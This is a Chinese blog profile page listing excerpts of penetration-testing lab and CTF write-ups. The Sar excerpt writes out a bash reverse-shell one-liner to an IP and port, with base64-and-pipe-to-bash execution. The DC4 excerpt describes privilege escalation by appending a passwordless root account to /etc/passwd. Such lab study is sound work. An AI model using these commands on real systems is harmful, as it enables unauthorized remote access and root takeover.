自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 NextCyber学习记录—渗透靶场DC9靶场学习超详细过程分享

该由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-26 12:10:44 315

原创 NextCyber学习记录—渗透靶场symfonos1靶场学习超详细过程分享

该由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-26 12:06:45 378

原创 NextCyber学习记录—渗透靶场symfonos3v2靶场学习超详细过程分享

能抓到 FTP 密码:因为 FTP 协议明文传输登录信息,tcpdump可直接捕获。抓到的是实时登录包:对应有人主动登录,或程序(如脚本、定时任务)自动登录的行为,而非服务定时发送的包。在渗透测试中,若抓到 FTP 密码,需结合登录来源(本地/远程)判断其价值——本地自动登录的密码可能属于系统账号或脚本配置,往往是提权的关键线索。使用tcpdump -i lo监听之后发现有pass就是ftp登录了。

2025-10-26 12:04:36 727

原创 NextCyber学习记录—渗透靶场SolidState靶场学习超详细过程分享

学到了jame-admin后台登录的操作然后还有pop3的渗透思路操作命令以及rbash的限制绕过。

2025-10-23 12:54:59 261

原创 NextCyber学习记录—渗透靶场MERCY靶场学习超详细过程分享

该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-22 12:20:18 704

原创 NextCyber学习记录—渗透靶场pwnLab靶场学习超详细过程分享

该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-22 12:13:47 254

原创 NextCyber学习记录—渗透靶场mrrobot靶场学习超详细过程分享

该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-22 12:12:42 215

原创 NextCyber学习记录—渗透靶场DC6靶场学习超详细过程分享

该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。

2025-10-22 12:11:17 316

原创 NextCyber学习记录—渗透靶场Sar靶场学习超详细过程分享

发现finally.sh执行了write.sh文件然后write.sh是可以进行写入操作的然后我们写一个反弹shell反弹过来的就有root权限了。这里有个点就是linux中运行的话要bash -c 'bash -i >& /dev/tcp/10.10.62.65/7777 0>&1'bash -i &>/dev/tcp/ip/端口 <&1。-d解密 然后|bash应该是使用bash进行执行。发现 会使用root权限执行 finally.sh。这里我们使用bash反弹然后使用base64编码。

2025-10-22 12:09:26 338

原创 NextCyber学习记录—渗透靶场toppo靶场学习超详细过程分享

使用命令nmap --min-rate 100000 -p- 10.20.110.203。该靶场由nextcyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。我们查看111端口的功能是什么。这个两个都可以提权我们尝试提权。可能是ssh的登录账户和密码。我们尝试查找suid提权。查看notes.txt。发现网站开放四个端口。然后我们进行目录扫描。发现没有sudo权限。

2025-10-21 16:13:21 281

原创 hacksudo ProximaCentauri

打靶场

2025-03-14 14:17:34 466

原创 hackmyvm——Family

新生详细教学

2025-02-24 16:51:18 638

原创 DC4靶场新手详细教程

admin::0:0:::/bin/bash 我们可以将用户设置成这个格式这个格式的意思是用户是admin 无密码 0是root权限 0是group root一个组别然后 使用 /bin/bashshell。teehee应该是一个类似于echo的东西然后我们可以通过这个teehee来将/etc/passwd中添加一个不需要密码就可以登录的用户并且具有root权限,:::warning /var/spool/mail/ 这个就是系统邮箱的位置了。这个密码文可能是jim的用户密码我们尝试爆破一下。

2025-01-05 15:56:36 446

原创 wireshark0051.pcap数据包

telnet 服务我们这个时候进行过滤我们猜测我们登录的话,服务肯定是telnet的然后可能会带有关键字user pass 这个类的关键字,我们构造过滤式,telnet contains "user"然后提示login successful 这个的时候我们下面的数据包都没有提示说要输入密码了,这个那感觉那个就是登录成功的时候了,这个数据包很奇怪,返回的是successful,追踪一下确实是登录成功了。这个应该是黑客执行的第一个命令,查看版本。先过滤ftp协议看看。这个包让重新输入密码。

2025-01-01 21:04:44 1027

原创 记一次简单的流量分析

登录凭证这个的意思应该是最黑客成功登录的账号和密码,tomcat的登录的信息放在了请求包中关键字是Authorization:Basic我们搜索一下。这里的意思就是黑客是如何持久化的这里有一个技巧就是我们可以使用那个过滤式然后流量从黑客上传的shell开始网下看就完事了。这题的要求是让我们分析确定黑客扫描端口的机子,一般扫描端口的话都会有大量的syn握手包。这个的意思应该是网站的是使用什么搭建的或者是黑客爆破的目录也就是黑客最后想干嘛的目录。这里的意思就是看看黑客使用的目录扫描的工具是什么,

2024-12-30 21:46:50 391

原创 [NISACTF 2022]babyserialize反序列化链子构造超级无敌详细宝宝级教学

反序列化链子构造超级无敌详细宝宝级教学

2024-09-18 20:28:15 385

原创 [MRCTF2020]Ezpop

反序列化,pop链构造

2024-01-30 17:18:41 502 1

原创 NSSCTF[ZJCTF 2019]NiZhuanSiWei详解(超级无敌详细,伪协议,文件包含,反序列化)

构造序列化去覆盖,获取flag

2024-01-29 21:34:49 1330 3

原创 ARL资产侦察灯塔系统搭建及使用

本文章是安装搭建docker容器和搭建灯塔的

2023-12-12 14:29:42 1831 1

原创 [极客大挑战 2019]Http1新手入门教学

BUUCTF 类型:请求头绕过 知识点:http请求头(Referer、X-Forwarded-For、User-Agent)

2023-11-05 19:12:01 583 1

原创 [GXYCTF2019]Ping Ping Ping1解题的思路

BUUCTF的[GXYCTF2019]Ping Ping Ping

2023-11-04 00:53:57 159 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除